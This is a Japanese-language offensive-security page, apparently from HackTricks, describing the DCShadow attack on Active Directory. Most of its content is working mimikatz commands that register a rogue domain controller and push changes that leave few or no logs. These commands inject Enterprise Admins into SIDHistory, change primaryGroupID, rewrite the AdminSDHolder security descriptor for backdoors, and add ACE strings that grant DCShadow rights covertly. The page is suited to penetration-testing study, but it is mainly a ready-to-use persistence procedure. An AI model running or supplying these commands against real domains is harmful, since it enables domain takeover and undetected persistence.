8.7 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
-
The PEASS Familyを発見しましょう。独占的なNFTのコレクションです。
-
公式のPEASS&HackTricksのグッズを手に入れましょう。
-
💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
-
**ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。
DCShadow
これは、ADに新しいドメインコントローラを登録し、指定されたオブジェクトに対して属性(SIDHistory、SPNなど)をログを残さずに追加するために使用されます。DA権限が必要で、ルートドメイン内にいる必要があります。
間違ったデータを使用すると、かなり醜いログが表示されます。
攻撃を実行するには、2つのmimikatzインスタンスが必要です。そのうちの1つは、SYSTEM特権でRPCサーバーを起動します(ここで行いたい変更を指定する必要があります)。もう1つのインスタンスは、値を追加するために使用されます:
{% code title="mimikatz1(RPCサーバー)" %}
!+
!processtoken
lsadump::dcshadow /object:username /attribute:Description /value="My new description"
{% code title="mimikatz2(プッシュ)- DAまたは同等の権限が必要" %}
lsadump::dcshadow /push
{% endcode %}
注意:mimikatz1セッションでは**elevate::token**は機能しません。なぜなら、それはスレッドの特権を昇格させるものであり、プロセスの特権を昇格させる必要があるからです。
また、"LDAP"オブジェクトを選択することもできます:/object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local
これらの変更を行うためには、DAからまたは次の最小限の権限を持つユーザーから変更をプッシュすることができます:
- ドメインオブジェクト:
- DS-Install-Replica(ドメインのレプリカの追加/削除)
- DS-Replication-Manage-Topology(レプリケーショントポロジの管理)
- DS-Replication-Synchronize(レプリケーションの同期)
- 構成コンテナのサイトオブジェクト(およびその子):
- CreateChild and DeleteChild
- DCとして登録されているコンピュータのオブジェクト:
- WriteProperty(Writeではない)
- ターゲットオブジェクト:
- WriteProperty(Writeではない)
Set-DCShadowPermissionsを使用して、特権のないユーザーにこれらの特権を与えることができます(これにより一部のログが残ります)。これはDA特権を持つよりもはるかに制限されたものです。
例:Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose これは、ユーザー名_student1がマシンmcorp-student1にログインした場合、オブジェクトroot1user_に対してDCShadow権限を持つことを意味します。
DCShadowを使用してバックドアを作成する
{% code title="SIDHistoryにEnterprise Adminsを設定する" %}
lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519
{% code title="プライマリグループIDの変更(ユーザーをドメイン管理者のメンバーに設定する)" %}
lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519
{% code title="AdminSDHolderのntSecurityDescriptorを変更する(ユーザーに完全な制御権を与える)" %}
#First, get the ACE of an admin already in the Security Descriptor of AdminSDHolder: SY, BA, DA or -519
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec tSecurity.sddl
#Second, add to the ACE permissions to your user and push it using DCShadow
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<whole modified ACL>
{% endcode %}
シャドウセプション - DCShadowを使用してDCShadowの権限を付与する(変更された権限ログなし)
次のACEをドメインオブジェクトの末尾にユーザーのSIDとともに追加する必要があります:
- ドメインオブジェクト上:
(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)(OA;;CR;9923a32a-3607-11d2-b9be-0000f87a36b2;;UserSID)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;UserSID)- 攻撃者のコンピュータオブジェクト上:
(A;;WP;;;UserSID) - ターゲットユーザーオブジェクト上:
(A;;WP;;;UserSID) - 構成コンテナ内のサイトオブジェクト:
(A;CI;CCDC;;;UserSID)
オブジェクトの現在のACEを取得するには:(New-Object System.DirectoryServices.DirectoryEntry("LDAP://DC=moneycorp,DC=loca l")).psbase.ObjectSecurity.sddl
この場合、複数の変更を行う必要があるため、mimikatz1セッション(RPCサーバー)でパラメータ**/stackを使用して各変更を行う必要があります。これにより、ローグサーバーでスタックされた変更をすべて実行するために、/push**を1回だけ実行するだけで済みます。
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
-
The PEASS Familyを発見しましょう、私たちの独占的なNFTのコレクション
-
公式のPEASS&HackTricksグッズを手に入れましょう
-
💬 Discordグループに参加するか、telegramグループに参加するか、Twitterで私をフォローする🐦@carlospolopm.
-
**ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。